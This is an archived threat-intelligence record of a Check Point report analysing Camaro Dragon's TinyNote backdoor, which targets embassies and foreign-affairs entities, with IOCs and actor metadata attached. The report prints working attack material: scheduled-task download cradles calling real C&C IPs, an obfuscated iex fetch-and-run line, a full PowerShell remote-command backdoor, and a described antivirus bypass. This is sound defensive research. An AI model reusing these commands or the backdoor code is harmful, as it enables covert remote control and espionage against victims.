{
	"id": "2e2698d6-2ec0-4c29-9bd4-0f235d249a5b",
	"created_at": "2026-04-06T03:37:12.502473Z",
	"updated_at": "2026-04-10T03:36:33.937217Z",
	"deleted_at": null,
	"sha1_hash": "60d3c7bb3a48469b0dfee6ab60478d55b5aee52f",
	"title": "Malware Spotlight: Camaro Dragon’s TinyNote Backdoor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 99484,
	"plain_text": "Malware Spotlight: Camaro Dragon’s TinyNote Backdoor\r\nBy etal\r\nPublished: 2023-06-01 · Archived: 2026-04-06 03:25:42 UTC\r\nExecutive summary\r\nSince early January 2023, there has been a notable surge in activity targeting European foreign affairs entities linked to Southeast and East Asia. The threat actors responsible are tracked by Check Point Research as Camaro Dragon and are associated with a broad network of espionage operations aligned with Chinese interests. Camaro Dragon overlaps with previously reported activities conducted by state-sponsored Chinese threat actors, namely Mustang Panda. A portion of the group’s attack toolset and underlying infrastructure was thoroughly described by fellow ESET researchers in their detailed technical paper on the MQsTTang backdoor. Check Point Research analysis of these attacks has also uncovered malicious TP-Link router firmware containing a custom implant named Horse Shell, which allows the threat actors to maintain persistent access and build anonymous infrastructure using compromised routers.\r\nIn this report, we analyze another previously undisclosed backdoor associated with this cluster of activity, which shares with it not only common infrastructure but also the same high-level intelligence-gathering goal.\r\nKey findings:\r\nA previously unknown Go-based backdoor called TinyNote was found on one of the Camaro Dragon distribution servers, in addition to being spotted in the wild. The malware samples also communicate with other known C\u0026C servers attributed to Camaro Dragon.\r\nThe TinyNote backdoor is distributed with names related to foreign affairs matters, and likely targets Southeast and East Asian embassies.\r\nThe backdoor performs a bypass of the Indonesian antivirus SmadAV, a security tool popular in Southeast Asian countries such as Myanmar and Indonesia, and apparently used by a subset of the campaign targets.\r\nThe TinyNote backdoor is a first-stage malware only capable of basic machine enumeration and command execution via PowerShell or Goroutines. However, it focuses on redundancy to gain a foothold on the infected machine, including setting up multiple persistence tasks, communication with several different C\u0026C servers, and different types of C\u0026C command execution.\r\nIntroduction\r\nWhen we investigated a few delivery servers related to Camaro Dragon, we discovered that one of them exposed the threat actors’ tools and files located on the server, protected only by basic HTTP Authorization with a known password. Among many other tools previously discussed by other researchers, we discovered yet another backdoor that we named TinyNote. Interestingly, the folder with the backdoor contained two other tools: Autoruns by Sysinternals, and HRSWord, which is a part of the Chinese Huorong Network Technology protection suite and is often used by various actors to disable endpoint protection tools.\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 1 of 10\r\nThe backdoor we found on the server, and its versions found in the wild, are executables with names related to foreign affairs, such as PDF_ Contacts List Of Invitated Deplomatic Members and Note_Documents_No.14-Tokyo-__From___Embassy___of___Russia_. This naming convention is similar to the one used at the same time by the MQsTTang backdoor versions discovered by ESET and found in VT. Similar to MQsTTang, the TinyNote backdoor samples also carry a folder icon in an attempt to deceive victims about their real purpose.\r\nThe custom backdoor is written in the Go programming language. In the copyright and build information for the executables, the malware developers left a reference to code.mil.mm, the Myanmar military infrastructure, likely to add credibility to their tool. The actors’ heightened interest in Myanmar entities and successful attacks carried out against them were previously discussed thoroughly. Our examination of the infrastructure led us to other findings that indicate the actors’ interest in Taiwan’s government entities as well.\r\nThe TinyNote backdoor is a basic remote shell, limited in capabilities: it enables the actors to fingerprint the infected machine, set up persistence, and establish two different ways to execute commands received from the C\u0026C server. Despite its simplicity, it employs an interesting method of bypassing a very specific antivirus solution, suggesting the actors had issues gaining a foothold in specific environments.\r\nSmadAV evasion\r\nAt the beginning of its execution, the malware starts a function called bypassSMADAV, whose purpose is to bypass the Indonesian antivirus SmadAV. The developers of the antivirus position their solution as a “second-layer antivirus” with “active users mostly from Indonesia, and other users mostly come from Southeast Asia and Africa Countries”. The existence of code that handles this specific antivirus once again confirms the focused targeting of Camaro Dragon campaigns and their knowledge of their victims’ environments and solutions. It’s worth mentioning that in previous operations, the actors used SmadAV for their own purposes, forcing its component SmadAVprotect32.exe to side-load their malicious DLL.\r\nWhen any new process starts in the system, SmadAV scans all available windows. For every problematic window found, the antivirus checks if the window is visible with the API function IsWindowVisible. If the window is visible, it adds the window owner’s process ID to an array containing all current processes that have at least one visible window:\r\nFigure 1 – SmadAV code that collects a list of PIDs that have associated windows.\r\nAfter iterating over all windows, the antivirus process iterates over this array and compares each process ID to the newly created process ID. If none is found, meaning the new process doesn’t have any visible windows, the antivirus deems the newly created process to be malicious and shows a popup that suggests blocking the created process. This flow might act as protection from techniques like process hollowing, where the process is created in suspended mode and then replaced with malicious code.\r\nThe threat actors appear to have reverse-engineered the logic of SmadAV and dealt with this check by creating a window without a window name, but with the class name “EDIT”, which is one of the available default window class names. The window attributes include a very large number for the X position, the width and height are set to 0, and flags such as WS_EX_TOOLWINDOW define the window as a tool window. These attributes make sure the window is identified as visible by the IsWindowVisible function, but in fact it is not shown to the user and does not appear in the taskbar or when pressing ALT+TAB:\r\nFigure 2 – A piece of malware code creates a specially crafted window to bypass SmadAV.\r\nBefore a call to CreateWindowEx, you would usually first need to register a class by calling RegisterClass and then call CreateWindowEx. But in this case, the threat actors decided to use a default class name, which allows them to skip calling the RegisterClass function prior to calling CreateWindow. Ultimately, creating this window allows the threat actors to bypass the check, as the newly created window is technically visible, and continue the backdoor execution uninterrupted.\r\nFigure 3 – SmadAV detection on the Go backdoor with the bypassSMADAV function removed.\r\nBackdoor execution flow\r\nThe malware creates a mutex named NASA\u0026USA and then continues execution according to one of two modes of operation.\r\nFirst mode: persistence, PowerShell backdoor, and malware “installation”\r\nThe malware checks if there is a “zip” string in the file path. If this is not found, it continues the execution flow. First, it creates the directory c:\\programdata\\Robots. If this fails, the malware does not continue the execution, likely because the infected user only has low privileges.\r\nNext, the malware creates 2 scheduled tasks called test and test2 to retrieve and execute PowerShell commands, each retrieved from robots.txt on different C\u0026C servers, most likely to eliminate a single point of failure:\r\nschtasks /Create /TN test /SC MINUTE /MO 15 /TR \"powershell \\\"$r=[System.Net.WebRequest]::Create(\\\\\\\"http://5.188.33.190/Robots.txt\\\\\\\");(new-object System.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -noprofile -\\\"\" /f\r\nschtasks /Create /TN test2 /SC MINUTE /MO 45 /TR \"powershell \\\"$r=[System.Net.WebRequest]::Create(\\\\\\\"http://103.159.132.91/Robots.txt\\\\\\\");(new-object System.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -noprofile -\\\"\" /f\r\nAt the time of execution, both servers returned the same code pointing to the third server:\r\nC:\\Windows\\System32\\cmd.exe /c \"start powershell.exe -nop -c set-alias exi iex;`$v1='iex (new-object net.webclient).dow';`$v2='nloadstring(''http://';`$v3='103.159.132.91/robots1.txt'')';exi(`$v1+`$v2+`$v3);\"\r\nThe final payload returned is a lightweight PowerShell backdoor, which retrieves a list of commands from the CMD header of the C\u0026C server response, executes them with Invoke-Expression, concatenates the outputs with the '_n1w_' string, and sends them back to the server in a POST request:\r\n$WindowState = '[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int stat);';add-type -name win -member $WindowState -namespace native;\r\n[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);\r\n$url=\"http://103.159.132.91:8081/\";\r\n$postParams = 'result=start';\r\nwhile (1 -eq 1) {\r\ntry {\r\n $data = [System.Text.Encoding]::UTF8.GetBytes($postParams);\r\n $req = [System.Net.WebRequest]::Create($url);\r\n $req.ServicePoint.ConnectionLimit =65535;\r\n If ($req.ServicePoint.CurrentConnections -ge 10000) {\r\n $req.ServicePoint.CloseConnectionGroup(\"\")\r\n }\r\n $req.ServicePoint.Expect100Continue = $false;\r\n #$req.Timeout = 10000;\r\n $req.Method = \"POST\";\r\n $req.ContentType = \"application/x-www-form-urlencoded\";\r\n $req.ContentLength = $data.Length;\r\n $Stream = $req.GetRequestStream();\r\n $Stream.Write($data, 0, $data.Length);$Stream.Flush();$Stream.Close();\r\n #waiting remote\r\n [System.Net.WebResponse] $resp = $req.GetResponse();$header=$resp.GetResponseHeader('CMD');\r\n $d = [System.Convert]::FromBase64String($header);\r\n $Ds = [System.Text.Encoding]::UTF8.GetString($d);$result = \"\";\r\n Foreach ($string in invoke-expression $Ds){$result=$result+'_n1w_'+$string;};\r\n $result = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($result));\r\n $postParams = \"result=$result\";\r\n}\r\ncatch{};\r\n};\r\nThe malware then copies itself to a zip file with the name [16 random characters].zip in c:\\users\\public\\, and also creates another copy of itself at a path that uses the zip name as a folder, for example c:\\users\\public\\pMiOxI3G44Igrpq7.zip\\. Both the file inside the zip and the unzipped copy of the file get the same randomly generated name [5 random characters].exe, for example 8q3Fj.exe. Finally, the malware creates a scheduled task to execute its copy from this randomized path:\r\nschtasks /Create /TN 8NaZrCq3pGeDRXKF /SC MINUTE /MO 15 /TR \"explorer.exe c:\\users\\public\\8NaZrCq3pGeDRXKF.zip\\8NaZr.exe\" /f\r\nSecond mode: the backdoor\r\nThis mode happens after the malware has achieved persistence and is running from a “zip” path. First, the malware enumerates the system for the following data and concatenates it into one string:\r\nThe current system username\r\nThe current user’s home folder\r\nThe system’s network interfaces (name, MacAddress, description)\r\nNext, it encrypts the string using a simple XOR encryption algorithm with the key NASA and Base64-encodes it afterward. It then picks one random C\u0026C URL out of the three available and constructs a GET request:\r\nhttp://5.188.33.190/api.php\r\nhttp://103.169.90.132/api.php\r\nhttp://103.159.132.91/api.php\r\nThe encoded enumeration data is stored in a cookie called SSN. Other headers in the request are constructed from several random values. The hostname header is selected from the following list:\r\nwww.google.com\r\nwww.facebook.com\r\nwww.gstatic.com\r\ntwitter.com\r\nThe user-agent is also randomized and is selected from the following list:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0\r\nMozilla/5.0 (iPhone; CPU iPhone OS 12_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1\r\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\r\nThe expected result from the server is JSON with the following structure:\r\n{\"msg\":\"[BASE64-ENCODED COMMAND]\"}\r\nAfter validating the JSON and Base64-decoding the command, the malware creates a Goroutine that executes the command and continues to listen for more commands in a loop.\r\nAttribution\r\nIn addition to the fact that one of the backdoor versions was found on the Camaro Dragon distribution server, there are other strong connections between the actors and the TinyNote malware:\r\nThe server 103.159.132[.]91, where one of the versions of the malware was first found, behaves like the C\u0026C server of the backdoor, and was also a delivery server for the MQsTTang backdoor during the same time period.\r\nAnother C\u0026C server, 103.169.90[.]132, is known to be used by the threat actors continuously.\r\nThe victimology and lures are consistent with the latest Camaro Dragon campaigns, including the activity associated with the MQsTTang backdoor. In addition, the actors also keep using a “folder” icon and a specific naming convention for some of their backdoors seen since early 2023.\r\nThe third C\u0026C server, 5.188.33[.]190, has rather unique SSL certificates with Alternative names mail.mofa.gov.tw, intra.mofa.gov.tw, and *.mofa.gov.tw. Another server with the same certificate, 23.106.123[.]59, is currently redirecting to the official infrastructure of the government of Taiwan, but was likely used for additional attacks by the threat actor.\r\nConclusion\r\nThe TinyNote backdoor highlights the targeted approach of Camaro Dragon and the extensive research they conduct prior to infiltrating their intended victims’ systems. Although the backdoor is not technically complex, it employs several noteworthy tactics to establish an initial foothold in the compromised systems. These include the use of Golang, a programming language rarely used in Camaro Dragon tools, minimal lightweight functionality, and an embedded bypass of a specific antivirus software commonly installed on potential targets. The simultaneous use of this backdoor together with other tools with different levels of technical advancement implies that the threat actors are actively seeking to diversify their attack arsenal.\r\nIOCs\r\nf0b081ca58b6c253aa0014847c62dbad\r\n6a2204b32a60aed0a3403c63ad2a529c\r\n5.188.33[.]190\r\n103.169.90[.]132\r\n103.159.132[.]91\r\n23.106.123[.]59\r\nCheck Point Customers remain protected:\r\nThreat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems, powered by ThreatCloud AI – the brain behind all of Check Point’s Security.\r\nSource: https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/"
	],
	"report_names": [
		"malware-spotlight-camaro-dragons-tinynote-backdoor"
	],
	"threat_actors": [
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "fad89cb7-83e8-4d8c-8cf8-dce2c6e54479",
			"created_at": "2023-10-27T02:00:07.764261Z",
			"updated_at": "2026-04-10T02:00:03.378226Z",
			"deleted_at": null,
			"main_name": "Camaro Dragon",
			"aliases": [],
			"source_name": "MISPGALAXY:Camaro Dragon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775446632,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/60d3c7bb3a48469b0dfee6ab60478d55b5aee52f.pdf",
		"text": "https://archive.orkl.eu/60d3c7bb3a48469b0dfee6ab60478d55b5aee52f.txt",
		"img": "https://archive.orkl.eu/60d3c7bb3a48469b0dfee6ab60478d55b5aee52f.jpg"
	}
}